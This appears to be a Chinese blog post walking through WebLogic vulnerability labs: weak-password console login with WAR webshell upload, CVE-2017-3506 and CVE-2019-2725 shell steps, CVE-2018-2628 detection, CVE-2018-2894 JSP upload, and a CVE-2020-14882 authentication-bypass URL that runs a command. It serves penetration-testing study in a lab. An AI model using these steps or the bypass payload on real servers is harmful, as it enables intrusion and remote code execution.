当前位置: 首页 > article >正文

常⻅中间件漏洞(WebLogic)靶场

1.后台弱⼝令GetShell

启动环境

默认账号密码:weblogic/Oracle@123
weblogic常⽤弱⼝令:https://cirt.net/passwords?criteria=weblogic
这⾥注意, 单个账号错误密码5次之后就会⾃动锁定。
172.16.1.51:7001/console/login/LoginForm.jsp
进来点击部署安装
进来点击上传文件
上传war包,jsp⽊⻢压缩成zip,修改后缀为war,上传
一直点击下一步来到保存点击保存
去哥斯拉连接
172.16.1.51:7001/1/1.jsp

2.CVE-2017-3506

开启环境并查看端口ip

进入/wls-wsat/CoordinatorPortType  验证漏洞是否存在

在当前页面抓包修改

返回kali监听6666端口反弹shell

3.CVE-2019-2725

这个还是用的上边的环境

访问/_async/AsyncResponseService 验证漏洞存在
在当前⻚⾯抓包 , 修改请求包 , 写⼊shell
然后放包去连接
http://ip/bea_wls_internal/sxy .jsp

4.CVE-2018-2628

开启环境查看端口

访问ip

使用工具检测漏洞存在

5.CVE-2018-2894

开启环境查看端口

获取密码:docker-compose logs | grep password

访问http://192.168.10.194:7001/console/login/LoginForm.jsp

拿刚才得到的账号密码登录

设置web服务测试开启: 域结构 -> base-domain -> ⾼级 -> 启动Web服务测试⻚
点击保存 , 进⼊ config.do ⽂件进⾏设置,将⽬录设置为 ws_utc 应⽤的静态⽂件css⽬录,访问这个⽬录是⽆需权限的,这⼀点很重要
http://192.168.10.194:7001/ws_utc/config.do
/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
点击安全 , 点击添加
右键审查元素 , 然后搜索16 , 找到对应时间戳
连接192.168.10.194 :7001/ws_utc/css/config/keystore/1726987575668_shell.jsp

6.CVE-2020-14882

192.168.10.194:7001/console/login/LoginForm.jsp  访问管理控制台

使⽤以下url绕过登录认证
http://192.168.10.194:7001/console/css/%252e%252e%252fconsole.portal

访问:http://192.168.10.194:7001 /console/css/%252e%252e%252fconsole.portal?
_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runti
me.getRuntime().exec('touch%20/tmp/success');")
docker中可以看到命令已经成功运⾏了

http://www.kler.cn/a/316229.html

相关文章:

  • 当你想要conda安装遇到UnavailableInvalidChannel: HTTP 404 NOT FOUND for channel的问题
  • Linux——GPIO输入输出裸机实验
  • git下载慢下载不了?Git国内国外下载地址镜像,git安装视频教程
  • Mysql数据库里的SSH连接
  • QQ 小程序已发布,但无法被搜索的解决方案
  • 今日 AI 简报 | 开源 RAG 文本分块库、AI代理自动化软件开发框架、多模态统一生成框架、在线图像背景移除等
  • 树莓派pico上手
  • 构建高可用和高防御力的云服务架构第五部分:PolarDB(5/5)
  • 今日leetCode 反转字符串
  • 第二证券:股价为什么出现大跌?股价大跌时怎么办?
  • 网安开发:杭州某科技银行面经和答案
  • 轻松获取京东商品信息:商品详情API接口使用教程
  • 关系数据库和非关系数据库
  • 信息安全数学基础(15)欧拉定理
  • 8--SpringBoot原理分析、注解-详解(面试高频提问点)
  • 【Python机器学习】NLP信息提取——值得提取的信息
  • Fyne ( go跨平台GUI )中文文档- 扩展Fyne (七)
  • 是什么推动了今年CSP-J/S报名人数的再创新高?
  • 【AI创作组】Matlab绘图基础之plot函数
  • [Redis][String][上]详细讲解
  • 使用Flink命令行和Java API远程提交Flink任务到Yarn
  • DOM XMLHttpRequest
  • yolov5/8/9/10模型在VOC数据集上的应用【代码+数据集+python环境+GUI系统】
  • 如何切换npm到淘宝的最新镜像源?
  • AIoT应用开发:给机器人接入‘记忆‘,完美解决「和谁对话多轮对话」!附 SQLite 入门实战
  • 数据库DML语句详解与实践